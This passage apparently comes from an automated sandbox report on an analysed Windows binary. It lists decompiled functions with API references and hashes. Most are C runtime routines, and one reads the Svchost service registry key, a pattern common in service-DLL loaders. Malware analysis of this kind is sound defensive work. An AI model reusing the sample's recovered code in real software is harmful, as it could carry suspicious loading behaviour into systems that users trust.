				short* _t12;
				short* _t14;
				int _t15;
				short* _t22;
				int _t24;
				void* _t27;
				void* _t31;
				short* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_push(_t27);
				_t24 = 0;
				_t36 = _a4;
				if(_a4 != 0) {
					_t33 = _a8;
					__eflags = _t33;
					if(__eflags == 0) {
						goto L1;
					}
					_t10 = E00A34584(_t27);
					__eflags = _t10;
					if(_t10 == 0) {
						_t22 = AreFileApisANSI();
						__eflags = _t22;
						if(_t22 == 0) {
							_t24 = 1;
							__eflags = 1;
						}
					}
					 *_t33 = 0;
					_t12 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, 0, 0);
					_v8 = _t12;
					__eflags = _t12;
					if(_t12 != 0) {
						_t14 = E00A34B53(_t31, _t12 + _t12);
						 *_t33 = _t14;
						__eflags = _t14;
						if(_t14 == 0) {
							goto L9;
						}
						_t15 = MultiByteToWideChar(_t24, 0, _a4, 0xffffffff, _t14, _v8);
						__eflags = _t15;
						if(_t15 != 0) {
							_t9 = 1;
							__eflags = 1;
							goto L14;
						}
						E00A35992(GetLastError());
						E00A34AD3( *_t33);
						 *_t33 =  *_t33 & 0x00000000;
						goto L8;
					} else {
						E00A35992(GetLastError());
						L8:
						L9:
						_t9 = 0;
						L14:
						return _t9;
					}
				}
				L1:
				_t7 = E00A359B3(_t36);
				_t34 = 0x16;
				 *_t7 = _t34;
				E00A35904();
				_t9 = _t34;
				goto L14;
			}

0x00a3300f
0x00a33012
0x00a33014
0x00a33017
0x00a3301a
0x00a33032
0x00a33035
0x00a33037
0x00000000
0x00000000
0x00a33039
0x00a3303e
0x00a33040
0x00a33042
0x00a33048
0x00a3304a
0x00a3304e
0x00a3304e
0x00a3304e
0x00a3304a
0x00a33058
0x00a3305c
0x00a33062
0x00a33065
0x00a33067
0x00a3307d
0x00a33082
0x00a33085
0x00a33087
0x00000000
0x00000000
0x00a33095
0x00a3309b
0x00a3309d
0x00a330ba
0x00a330ba
0x00000000
0x00a330ba
0x00a330a6
0x00a330ad
0x00a330b2
0x00000000
0x00a33069
0x00a33070
0x00a33075
0x00a33076
0x00a33076
0x00a330bb
0x00a330c0
0x00a330c0
0x00a33067
0x00a3301c
0x00a3301c
0x00a33023
0x00a33024
0x00a33026
0x00a3302b
0x00000000

APIs

___crtIsPackagedApp.LIBCMT ref: 00A33039
AreFileApisANSI.KERNEL32 ref: 00A33042
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A3305C
GetLastError.KERNEL32 ref: 00A33069
__dosmaperr.LIBCMT ref: 00A33070

Part of subcall function 00A359B3: __getptd_noexit.LIBCMT ref: 00A359B3

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
String ID:
API String ID: 1083238821-0
Opcode ID: 42c701c25585538234305ae0f5910b571ed95e20f4ead5c628704dcf8f42e702
Instruction ID: b989e81a830579ec46a6a1f5e5fd552a8d541c28d19f55ff37597cde7940d84b
Opcode Fuzzy Hash: 42c701c25585538234305ae0f5910b571ed95e20f4ead5c628704dcf8f42e702
Instruction Fuzzy Hash: 6D118677A08215BFDF246FB49D4677B76ACEB06761F104528F951C5191EA31CA008661

Uniqueness

Uniqueness Score: -1.00%

Function 00A315A0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
registryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00A315A0(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t19;
				long _t22;

				_v16 = 0;
				_v12 = 0;
				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v16);
				_v8 = _t19;
				if(_v8 == 0) {
					_v12 = E00A31000(_v16, _a4);
					_t22 = RegCloseKey(_v16);
					if(_v12 != 0) {
						_v8 = E00A31450(_v12);
						if(_v8 == 0) {
							HeapFree(GetProcessHeap(), 0, _v12);
						}
						return _v8;
					}
					0xa30000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost");
					0xa30000(_a4, _t22);
					0xa30000("cannot find registry value %s in %s\n", _t22);
					return 0;
				}
				0xa30000(L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", _v8);
				0xa30000("cannot open key %s, err=%d\n", _t19);
				return 0;
			}

0x00a315a6
0x00a315ad
0x00a315c9
0x00a315cf
0x00a315d6
0x00a31602
0x00a31609
0x00a31613
0x00a31641
0x00a31648
0x00a31657
0x00a31657
0x00000000
0x00a3165d
0x00a3161a
0x00a31624
0x00a3162f
0x00000000
0x00a31634
0x00a315e1
0x00a315ec
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 00A315C9
RegCloseKey.ADVAPI32(00000000), ref: 00A31609

Strings

Software\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 00A315BF, 00A315DC, 00A31615
cannot find registry value %s in %s, xrefs: 00A3162A
cannot open key %s, err=%d, xrefs: 00A315E7

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen
String ID: Software\Microsoft\Windows NT\CurrentVersion\Svchost$cannot find registry value %s in %s$cannot open key %s, err=%d
API String ID: 47109696-3561747105
Opcode ID: 8ae2aaad9cb2eebd76f774c1bcd684ce30fcbfa12a8ce210b39b75ff60bb17eb
Instruction ID: 5a628c16f5090293b48faa5664850695517fdcec1dfe3875fabb00316d497e3d
Opcode Fuzzy Hash: 8ae2aaad9cb2eebd76f774c1bcd684ce30fcbfa12a8ce210b39b75ff60bb17eb
Instruction Fuzzy Hash: A1114978A00208FFDB04EBE0CE4AFEFB7B8AB89741F108654F506A7181DB705A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A32F7C, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A32F7C(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				char _t6;
				long _t14;
				long* _t27;

				E00A3340B(_t3);
				if(E00A34A85() != 0) {
					_t6 = E00A3440F(E00A32CD7);
					"\n" = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E00A34B0B(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E00A32FF2();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E00A3446B("\n", _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E00A32EC9(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E00A32FF2();
					return 0;
				}
			}

0x00a32f7c
0x00a32f88
0x00a32f97
0x00a32f9c
0x00a32fa2
0x00a32fa5
0x00000000
0x00a32fa7
0x00a32fb4
0x00a32fb8
0x00a32fba
0x00a32fe9
0x00a32fe9
0x00a32fee
0x00a32ff1
0x00a32fbc
0x00a32fca
0x00a32fcc
0x00000000
0x00a32fce
0x00a32fce
0x00a32fd0
0x00a32fd1
0x00a32fd8
0x00a32fde
0x00a32fe2
0x00a32fe6
0x00a32fe8
0x00a32fe8
0x00a32fcc
0x00a32fba
0x00a32f8a
0x00a32f8a
0x00a32f8a
0x00a32f91
0x00a32f91

APIs

__init_pointers.LIBCMT ref: 00A32F7C

Part of subcall function 00A3340B: RtlEncodePointer.NTDLL(00000000,?,00A32F81,00A32970,00A4E008,00000014), ref: 00A3340E
Part of subcall function 00A3340B: __initp_misc_winsig.LIBCMT ref: 00A33429
Part of subcall function 00A3340B: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A345CB
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A345DF
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A345F2
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A34605
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A34618
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A3462B
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A3463E
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A34651
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A34664
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A34677
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A3468A
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A3469D
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A346B0
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A346C3
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A346D6
Part of subcall function 00A3340B: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A346E9

__mtinitlocks.LIBCMT ref: 00A32F81
__mtterm.LIBCMT ref: 00A32F8A

Part of subcall function 00A32FF2: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A32F8F,00A32970,00A4E008,00000014), ref: 00A3499F
Part of subcall function 00A32FF2: _free.LIBCMT ref: 00A349A6
Part of subcall function 00A32FF2: DeleteCriticalSection.KERNEL32(00A501F8,?,?,00A32F8F,00A32970,00A4E008,00000014), ref: 00A349C8

__calloc_crt.LIBCMT ref: 00A32FAF
__initptd.LIBCMT ref: 00A32FD1
GetCurrentThreadId.KERNEL32 ref: 00A32FD8

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 35541b5a8a34aafb0e85e16e02dd4d1a905591158e72e65bbb53129a62544d30
Instruction ID: 0a25795131e3b3de1ad2a317db5e1163f657fd394eb902b70847843c8b77da8d
Opcode Fuzzy Hash: 35541b5a8a34aafb0e85e16e02dd4d1a905591158e72e65bbb53129a62544d30
Instruction Fuzzy Hash: 1EF090321597222EF664B7B87D03B4B6A94AB01771F21462AF490D50D1EE21D85246A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A31000, Relevance: 9.1, APIs: 6, Instructions: 66
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A31000(void* _a4, short* _a8) {
				void* _v8;
				long _v12;
				unsigned int _v16;
				int _v20;
				int _v24;

				_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, 0,  &_v20);
				if(_v12 == 0) {
					_v16 = _v20 + 4;
					_v8 = HeapAlloc(GetProcessHeap(), 0, _v16);
					_v12 = RegQueryValueExW(_a4, _a8, 0,  &_v24, _v8,  &_v20);
					if(_v12 == 0) {
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 2)) = 0;
						 *((short*)(_v8 + (_v16 >> 1) * 2 - 4)) = 0;
						return _v8;
					}
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0;
				}
				return 0;
			}

0x00a31020
0x00a31027
0x00a31033
0x00a31049
0x00a31068
0x00a3106f
0x00a31092
0x00a310a1
0x00000000
0x00a310a6
0x00a3107e
0x00000000
0x00a31084
0x00000000

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A3101A
GetProcessHeap.KERNEL32(00000000,?), ref: 00A3103C
HeapAlloc.KERNEL32(00000000), ref: 00A31043
RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00A31062
GetProcessHeap.KERNEL32(00000000,?), ref: 00A31077
HeapFree.KERNEL32(00000000), ref: 00A3107E

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$ProcessQueryValue$AllocFree
String ID:
API String ID: 1095795037-0
Opcode ID: 0b5dcec25865096a24b34f12a01368254a628a3a2accea9e5c85ba24c111c40b
Instruction ID: bac1847d340f813f21b5afec3eb09b557688efe03fa26980263151d343913c8e
Opcode Fuzzy Hash: 0b5dcec25865096a24b34f12a01368254a628a3a2accea9e5c85ba24c111c40b
Instruction Fuzzy Hash: 4921EAB9A00108EFDB04DFE8D845FEFB7B8EB88300F108559F516D7290D6319A55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A39E35, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A39E35(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t10;
				signed int _t12;
				intOrPtr* _t16;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0xa4e2a8);
				_t10 = E00A34010(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					_t12 = E00A34934(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *((intOrPtr*)(_t31 + 4)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0xa50750) {
							E00A34AD3( *((intOrPtr*)(_t31 + 4)));
						}
					}
					 *(_t32 - 4) = 0xfffffffe;
					E00A3A45A();
					if( *_t31 != 0) {
						E00A34934(0xc);
						 *(_t32 - 4) = 1;
						E00A34E58( *_t31);
						_t16 =  *_t31;
						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0xa50488) {
							E00A34CFE(_t16);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E00A3A466();
					}
					_t10 = E00A34AD3(_t31);
				}
				return E00A34055(_t10);
			}

0x00a3a3b8
0x00a3a3ba
0x00a3a3bf
0x00a3a3c4
0x00a3a3c9
0x00a3a3d1
0x00a3a3d7
0x00a3a3e0
0x00a3a3e5
0x00a3a3e9
0x00a3a3f7
0x00a3a3fc
0x00a3a3e9
0x00a3a3fd
0x00a3a404
0x00a3a40c
0x00a3a410
0x00a3a416
0x00a3a41f
0x00a3a425
0x00a3a429
0x00a3a438
0x00a3a43d
0x00a3a43e
0x00a3a445
0x00a3a445
0x00a3a44b
0x00a3a450
0x00a3a456

APIs

__lock.LIBCMT ref: 00A3A3D1

Part of subcall function 00A34934: __mtinitlocknum.LIBCMT ref: 00A34946
Part of subcall function 00A34934: __amsg_exit.LIBCMT ref: 00A34952
Part of subcall function 00A34934: EnterCriticalSection.KERNEL32(?,?,00A32F12,0000000D), ref: 00A3495F

_free.LIBCMT ref: 00A3A3F7

Part of subcall function 00A34AD3: HeapFree.KERNEL32(00000000,00000000,?,00A32EBA,00000000,00000003), ref: 00A34AE7
Part of subcall function 00A34AD3: GetLastError.KERNEL32(00000000,?,00A32EBA,00000000,00000003), ref: 00A34AF9

__lock.LIBCMT ref: 00A3A410
___removelocaleref.LIBCMT ref: 00A3A41F
___freetlocinfo.LIBCMT ref: 00A3A438
_free.LIBCMT ref: 00A3A44B

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
String ID:
API String ID: 626533743-0
Opcode ID: b879c1ea7f20dbfc6e4c92c8a437fc8a1303a678456e04b6254c16404f478c03
Instruction ID: 4b6cee32a8deedd39f1c750621afa9e9a0f0aac69d2e96d10a47b038e7341de2
Opcode Fuzzy Hash: b879c1ea7f20dbfc6e4c92c8a437fc8a1303a678456e04b6254c16404f478c03
Instruction Fuzzy Hash: 47012831542B24E7DF38AF68CA0A76D73A0AF25765F20460DF0E55A4D0CFB4A980C643

Uniqueness

Uniqueness Score: -1.00%

Function 00A37535, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A37535(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0xa5129c, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0xa520d0 - _t7;
								if(__eflags == 0) {
									_t9 = E00A359B3(__eflags);
									 *_t9 = E00A35A0C(GetLastError());
									goto L17;
								} else {
									__eflags = E00A35D7B(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E00A359B3(__eflags);
										 *_t12 = E00A35A0C(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00A35D7B(_t6, _t31);
						 *((intOrPtr*)(E00A359B3(__eflags))) = 0xc;
						goto L12;
					} else {
						E00A34AD3(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00A374A3(__ebx, __edx, __edi, _a8);
				}
			}

0x00a3753c
0x00a3754a
0x00a3754d
0x00a3754f
0x00a3755e
0x00a37591
0x00a37591
0x00a37594
0x00000000
0x00000000
0x00a37561
0x00a37563
0x00a37565
0x00a37565
0x00a37565
0x00a37572
0x00a37578
0x00a3757a
0x00a3757c
0x00a375dc
0x00a375dc
0x00a3757e
0x00a3757e
0x00a37584
0x00a375c6
0x00a375da
0x00000000
0x00a37586
0x00a3758d
0x00a3758f
0x00a375ae
0x00a375c2
0x00a375a8
0x00a375a8
0x00a375a8
0x00000000
0x00000000
0x00000000
0x00a3758f
0x00a37584
0x00000000
0x00a375aa
0x00a37597
0x00a375a2
0x00000000
0x00a37551
0x00a37554
0x00a3755a
0x00a3755a
0x00a375ab
0x00a375ad
0x00a3753e
0x00a37548
0x00a37548

APIs

_malloc.LIBCMT ref: 00A37541

Part of subcall function 00A374A3: __FF_MSGBANNER.LIBCMT ref: 00A374BA
Part of subcall function 00A374A3: __NMSG_WRITE.LIBCMT ref: 00A374C1
Part of subcall function 00A374A3: RtlAllocateHeap.NTDLL(00AC0000,00000000,00000001,00000000,00000000,00000000,?,00A34B69,?,?,?,00000000,?,00A34A1E,00000018,00A4E0F8), ref: 00A374E6

_free.LIBCMT ref: 00A37554

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 29a1000cca2178bdbb1889d81c154a580d55467a05e805b6a2c9b584d72184cd
Instruction ID: d7d2ee57b27d46b42d1b585aae0dd5d3236e560a23edd4a68dc3f2b77ae49ddd
Opcode Fuzzy Hash: 29a1000cca2178bdbb1889d81c154a580d55467a05e805b6a2c9b584d72184cd
Instruction Fuzzy Hash: 8211C6B2C0D611AFDB79AFB8AD0576E3794AF453B0F204529F9499A260EB718940C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00A40AB3, Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A40AB3(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E00A34FE1( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00A406D5( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00A359B3(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x00a40abb
0x00a40ac0
0x00a40ada
0x00000000
0x00a40ada
0x00a40ac2
0x00a40ac7
0x00000000
0x00000000
0x00a40acc
0x00a40ae9
0x00a40aee
0x00a40af1
0x00a40af8
0x00a40b17
0x00a40b1e
0x00a40b20
0x00a40b64
0x00a40b73
0x00a40b81
0x00a40b83
0x00a40b93
0x00a40b93
0x00a40b97
0x00a40b99
0x00a40b9c
0x00a40b9c
0x00a40b9c
0x00a40b9c
0x00000000
0x00a40ba2
0x00a40b85
0x00a40b85
0x00a40b8a
0x00a40b8a
0x00a40b8d
0x00000000
0x00a40b8d
0x00a40b22
0x00a40b25
0x00a40b29
0x00a40b52
0x00a40b52
0x00a40b55
0x00a40b55
0x00000000
0x00000000
0x00a40b57
0x00a40b5b
0x00000000
0x00000000
0x00a40b5d
0x00a40b5d
0x00000000
0x00a40b5d
0x00a40b2b
0x00a40b2e
0x00000000
0x00000000
0x00a40b32
0x00a40b45
0x00a40b4b
0x00a40b4e
0x00a40b50
0x00000000
0x00000000
0x00000000
0x00a40b50
0x00a40afa
0x00a40afd
0x00a40aff
0x00a40b04
0x00a40b04
0x00a40b09
0x00000000
0x00a40b09
0x00a40ace
0x00a40ad3
0x00a40ad7
0x00a40ad7
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00A40AE9
__isleadbyte_l.LIBCMT ref: 00A40B17
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 00A40B45
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 00A40B7B

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 101d4f1c93ca787a9c8a14f52db4ef7b8c06ece527b456f14d70cd258090e461
Instruction ID: c771d68bd77561edaea843eff26a5cf1ac20f2fb269b16c0e707f92de3d31b68
Opcode Fuzzy Hash: 101d4f1c93ca787a9c8a14f52db4ef7b8c06ece527b456f14d70cd258090e461
Instruction Fuzzy Hash: DC31EF39600206AFDB219F75C845FAB7BB6FFC1768F158168F954970A0E730E852EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A446B1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A446B1(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00A44C20(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00A44755(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00A44ED4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00A44DF5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00a446b4
0x00a446ba
0x00a4472d
0x00000000
0x00a446c1
0x00a446c1
0x00a446c4
0x00a446df
0x00a446e2
0x00a44702
0x00a44714
0x00a446e4
0x00a446e4
0x00a446e7
0x00000000
0x00a446e9
0x00a446fb
0x00a446fb
0x00a446e7
0x00a44732
0x00a44736
0x00a446c6
0x00a446de
0x00a446de
0x00a446c4

APIs

__cftof_l.LIBCMT ref: 00A446D5

Part of subcall function 00A44DF5: __fltout2.LIBCMT ref: 00A44E1E

__cftog_l.LIBCMT ref: 00A446FB
__cftoe_l.LIBCMT ref: 00A4472D

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
